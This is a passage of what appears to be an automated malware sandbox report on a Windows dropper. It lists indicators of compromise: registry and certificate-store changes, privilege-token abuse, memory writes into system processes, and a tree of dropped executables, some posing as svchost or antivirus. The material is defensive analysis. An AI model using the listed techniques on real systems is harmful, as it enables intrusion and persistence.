0100000000000000bdeab2a628acda01 SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-107 = "Microsoft Excel Comma Separated Values File" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-111 = "Microsoft Excel Macro-Enabled Template" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-182 = "Microsoft PowerPoint Template" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xht\OpenWithList SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32,@elscore.dll,-4 = "Microsoft Simplified Chinese to Traditional Chinese Transliteration" SearchIndexer.exe Key created \REGISTRY\USER\.DEFAULT\Software SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wvx\OpenWithList SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-913 = "MHTML Document" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\MPEG2Demultiplexer SearchFilterHost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32,@elscore.dll,-6 = "Microsoft Cyrillic to Latin Transliteration" SearchIndexer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit SearchFilterHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.DVR-MS\OpenWithList SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-915 = "XHTML Document" SearchProtocolHost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{A38B883C-1682-497E-97B0-0A3A9E801682} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000c2767ea628acda01 SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device SearchFilterHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-178 = "OpenDocument Presentation" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9902 = "Movie Clip" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-131 = "Rich Text Format" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32,@elscore.dll,-2 = "Microsoft Script Detection" SearchIndexer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\Windows.UI.Immersive.dll,-38304 = "Public Account Pictures" SearchProtocolHost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{F81B1B56-7613-4EE4-BC05-1FAB5DE5C07E} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000004a11baa628acda01 SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SBE SearchFilterHost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1E589E9D-8A8D-46D9-A2F9-E6D4F8161EE9} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000f724cda628acda01 SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie SearchFilterHost.exe -
Modifies registry class 2 IoCs
Processes:
output.exePirate_24S.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings output.exe Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings Pirate_24S.exe -
Processes:
eagleget-2-1-6-50.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 eagleget-2-1-6-50.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e eagleget-2-1-6-50.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e eagleget-2-1-6-50.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Setup.exewin1.exeMsBuild.execomp.exeoutput.exeAcroRd32.exeFUT.au3svcshost.exepowershell.exepowershell.exeprint.exeupdater.exepid process 6532 Setup.exe 6532 Setup.exe 6532 Setup.exe 4392 win1.exe 4392 win1.exe 4392 win1.exe 4392 win1.exe 4392 win1.exe 6520 MsBuild.exe 6520 MsBuild.exe 5964 comp.exe 5964 comp.exe 5964 comp.exe 5964 comp.exe 2360 output.exe 2360 output.exe 6732 AcroRd32.exe 6732 AcroRd32.exe 6732 AcroRd32.exe 6732 AcroRd32.exe 6732 AcroRd32.exe 6732 AcroRd32.exe 6732 AcroRd32.exe 6732 AcroRd32.exe 6732 AcroRd32.exe 6732 AcroRd32.exe 6732 AcroRd32.exe 6732 AcroRd32.exe 6732 AcroRd32.exe 6732 AcroRd32.exe 6732 AcroRd32.exe 6732 AcroRd32.exe 6732 AcroRd32.exe 6732 AcroRd32.exe 6732 AcroRd32.exe 6732 AcroRd32.exe 5608 FUT.au3 5608 FUT.au3 3272 svcshost.exe 3272 svcshost.exe 5560 powershell.exe 5560 powershell.exe 5560 powershell.exe 7488 powershell.exe 7488 powershell.exe 7488 powershell.exe 3272 svcshost.exe 3272 svcshost.exe 3272 svcshost.exe 3272 svcshost.exe 3272 svcshost.exe 3272 svcshost.exe 3272 svcshost.exe 7136 print.exe 7136 print.exe 7136 print.exe 7136 print.exe 7136 print.exe 7136 print.exe 7136 print.exe 7136 print.exe 7184 updater.exe 7184 updater.exe 7184 updater.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
Setup.execomp.exepid process 6532 Setup.exe 5964 comp.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
syslmgrsvc.exepid process 7484 syslmgrsvc.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
New Text Document mod.exeAntiVirus2.exesvchost.exeMsBuild.exewin1.exealabi.execsc.exetakeown.exeSearchIndexer.exe7z.exe7z.exe7z.exesvcshost.exepowershell.exepowershell.exetaskkill.exe7z.exe7z.exedescription pid process Token: SeDebugPrivilege 1388 New Text Document mod.exe Token: SeDebugPrivilege 4304 AntiVirus2.exe Token: SeDebugPrivilege 6100 svchost.exe Token: SeDebugPrivilege 6520 MsBuild.exe Token: SeBackupPrivilege 6520 MsBuild.exe Token: SeSecurityPrivilege 6520 MsBuild.exe Token: SeSecurityPrivilege 6520 MsBuild.exe Token: SeSecurityPrivilege 6520 MsBuild.exe Token: SeSecurityPrivilege 6520 MsBuild.exe Token: SeDebugPrivilege 4392 win1.exe Token: SeDebugPrivilege 6100 svchost.exe Token: SeDebugPrivilege 6476 alabi.exe Token: SeDebugPrivilege 6928 csc.exe Token: SeTakeOwnershipPrivilege 6332 takeown.exe Token: 33 756 SearchIndexer.exe Token: SeIncBasePriorityPrivilege 756 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 756 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 756 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 756 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 756 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 756 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 756 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 756 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 756 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 756 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 756 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 756 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 756 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 756 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 756 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 756 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 756 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 756 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 756 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 756 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 756 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 756 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 756 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 756 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 756 SearchIndexer.exe Token: SeRestorePrivilege 5136 7z.exe Token: 35 5136 7z.exe Token: SeSecurityPrivilege 5136 7z.exe Token: SeSecurityPrivilege 5136 7z.exe Token: SeRestorePrivilege 6800 7z.exe Token: 35 6800 7z.exe Token: SeSecurityPrivilege 6800 7z.exe Token: SeSecurityPrivilege 6800 7z.exe Token: SeRestorePrivilege 6668 7z.exe Token: 35 6668 7z.exe Token: SeSecurityPrivilege 6668 7z.exe Token: SeSecurityPrivilege 6668 7z.exe Token: SeDebugPrivilege 3272 svcshost.exe Token: SeDebugPrivilege 5560 powershell.exe Token: SeDebugPrivilege 7488 powershell.exe Token: SeDebugPrivilege 7048 taskkill.exe Token: SeRestorePrivilege 2556 7z.exe Token: 35 2556 7z.exe Token: SeSecurityPrivilege 2556 7z.exe Token: SeSecurityPrivilege 2556 7z.exe Token: SeRestorePrivilege 7756 7z.exe Token: 35 7756 7z.exe Token: SeSecurityPrivilege 7756 7z.exe Token: SeSecurityPrivilege 7756 7z.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
AcroRd32.execrt.tmpClient.exepid process 6732 AcroRd32.exe 6896 crt.tmp 1680 Client.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
Client.exepid process 1680 Client.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
win1.exeAcroRd32.exepid process 4392 win1.exe 6732 AcroRd32.exe 6732 AcroRd32.exe 6732 AcroRd32.exe 6732 AcroRd32.exe 6732 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
New Text Document mod.exexin.exeSetup.exeoutput.execrt.execomp.exeAcroRd32.execrt.tmpRdrCEF.exedescription pid process target process PID 1388 wrote to memory of 4436 1388 New Text Document mod.exe xin.exe PID 1388 wrote to memory of 4436 1388 New Text Document mod.exe xin.exe PID 1388 wrote to memory of 4436 1388 New Text Document mod.exe xin.exe PID 1388 wrote to memory of 3256 1388 New Text Document mod.exe eagleget-2-1-6-50.exe PID 1388 wrote to memory of 3256 1388 New Text Document mod.exe eagleget-2-1-6-50.exe PID 1388 wrote to memory of 4304 1388 New Text Document mod.exe AntiVirus2.exe PID 1388 wrote to memory of 4304 1388 New Text Document mod.exe AntiVirus2.exe PID 1388 wrote to memory of 4304 1388 New Text Document mod.exe AntiVirus2.exe PID 4436 wrote to memory of 6520 4436 xin.exe MsBuild.exe PID 4436 wrote to memory of 6520 4436 xin.exe MsBuild.exe PID 4436 wrote to memory of 6520 4436 xin.exe MsBuild.exe PID 4436 wrote to memory of 6520 4436 xin.exe MsBuild.exe PID 4436 wrote to memory of 6520 4436 xin.exe MsBuild.exe PID 4436 wrote to memory of 6520 4436 xin.exe MsBuild.exe PID 4436 wrote to memory of 6520 4436 xin.exe MsBuild.exe PID 4436 wrote to memory of 6520 4436 xin.exe MsBuild.exe PID 1388 wrote to memory of 6532 1388 New Text Document mod.exe Setup.exe PID 1388 wrote to memory of 6532 1388 New Text Document mod.exe Setup.exe PID 1388 wrote to memory of 6532 1388 New Text Document mod.exe Setup.exe PID 1388 wrote to memory of 6100 1388 New Text Document mod.exe svchost.exe PID 1388 wrote to memory of 6100 1388 New Text Document mod.exe svchost.exe PID 1388 wrote to memory of 4392 1388 New Text Document mod.exe win1.exe PID 1388 wrote to memory of 4392 1388 New Text Document mod.exe win1.exe PID 6532 wrote to memory of 5964 6532 Setup.exe comp.exe PID 6532 wrote to memory of 5964 6532 Setup.exe comp.exe PID 6532 wrote to memory of 5964 6532 Setup.exe comp.exe PID 6532 wrote to memory of 5964 6532 Setup.exe comp.exe PID 1388 wrote to memory of 2360 1388 New Text Document mod.exe output.exe PID 1388 wrote to memory of 2360 1388 New Text Document mod.exe output.exe PID 1388 wrote to memory of 2360 1388 New Text Document mod.exe output.exe PID 2360 wrote to memory of 6732 2360 output.exe AcroRd32.exe PID 2360 wrote to memory of 6732 2360 output.exe AcroRd32.exe PID 2360 wrote to memory of 6732 2360 output.exe AcroRd32.exe PID 2360 wrote to memory of 5488 2360 output.exe SIG.EXE PID 2360 wrote to memory of 5488 2360 output.exe SIG.EXE PID 2360 wrote to memory of 5488 2360 output.exe SIG.EXE PID 1388 wrote to memory of 6476 1388 New Text Document mod.exe alabi.exe PID 1388 wrote to memory of 6476 1388 New Text Document mod.exe alabi.exe PID 1388 wrote to memory of 6476 1388 New Text Document mod.exe alabi.exe PID 1388 wrote to memory of 5168 1388 New Text Document mod.exe crt.exe PID 1388 wrote to memory of 5168 1388 New Text Document mod.exe crt.exe PID 1388 wrote to memory of 5168 1388 New Text Document mod.exe crt.exe PID 5168 wrote to memory of 6896 5168 crt.exe crt.tmp PID 5168 wrote to memory of 6896 5168 crt.exe crt.tmp PID 5168 wrote to memory of 6896 5168 crt.exe crt.tmp PID 5964 wrote to memory of 5608 5964 comp.exe FUT.au3 PID 5964 wrote to memory of 5608 5964 comp.exe FUT.au3 PID 5964 wrote to memory of 5608 5964 comp.exe FUT.au3 PID 6732 wrote to memory of 5556 6732 AcroRd32.exe RdrCEF.exe PID 6732 wrote to memory of 5556 6732 AcroRd32.exe RdrCEF.exe PID 6732 wrote to memory of 5556 6732 AcroRd32.exe RdrCEF.exe PID 6896 wrote to memory of 5500 6896 crt.tmp soundermidiplayer.exe PID 6896 wrote to memory of 5500 6896 crt.tmp soundermidiplayer.exe PID 6896 wrote to memory of 5500 6896 crt.tmp soundermidiplayer.exe PID 6896 wrote to memory of 3456 6896 crt.tmp soundermidiplayer.exe PID 6896 wrote to memory of 3456 6896 crt.tmp soundermidiplayer.exe PID 6896 wrote to memory of 3456 6896 crt.tmp soundermidiplayer.exe PID 5964 wrote to memory of 5608 5964 comp.exe FUT.au3 PID 5964 wrote to memory of 5608 5964 comp.exe FUT.au3 PID 6732 wrote to memory of 7092 6732 AcroRd32.exe RdrCEF.exe PID 6732 wrote to memory of 7092 6732 AcroRd32.exe RdrCEF.exe PID 6732 wrote to memory of 7092 6732 AcroRd32.exe RdrCEF.exe PID 5556 wrote to memory of 7324 5556 RdrCEF.exe RdrCEF.exe PID 5556 wrote to memory of 7324 5556 RdrCEF.exe RdrCEF.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 1804 attrib.exe 7580 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Users\Admin\AppData\Local\Temp\a\xin.exe"C:\Users\Admin\AppData\Local\Temp\a\xin.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6520
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 2523⤵
- Program crash
PID:5324
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\eagleget-2-1-6-50.exe"C:\Users\Admin\AppData\Local\Temp\a\eagleget-2-1-6-50.exe"2⤵
- Executes dropped EXE
- Modifies system certificate store
PID:3256
-
-
C:\Users\Admin\AppData\Local\Temp\a\AntiVirus2.exe"C:\Users\Admin\AppData\Local\Temp\a\AntiVirus2.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4304
-
-
C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:6532 -
C:\Windows\SysWOW64\comp.exeC:\Windows\SysWOW64\comp.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:5964 -
C:\Users\Admin\AppData\Local\Temp\FUT.au3C:\Users\Admin\AppData\Local\Temp\FUT.au34⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:5608
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6100
-
-
C:\Users\Admin\AppData\Local\Temp\a\win1.exe"C:\Users\Admin\AppData\Local\Temp\a\win1.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4392
-
-
C:\Users\Admin\AppData\Local\Temp\a\output.exe"C:\Users\Admin\AppData\Local\Temp\a\output.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\DOCUMENT (3).PDF"3⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:6732 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵
- Suspicious use of WriteProcessMemory
PID:5556 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=E5444D30E377EB2AE4F120435E836C99 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,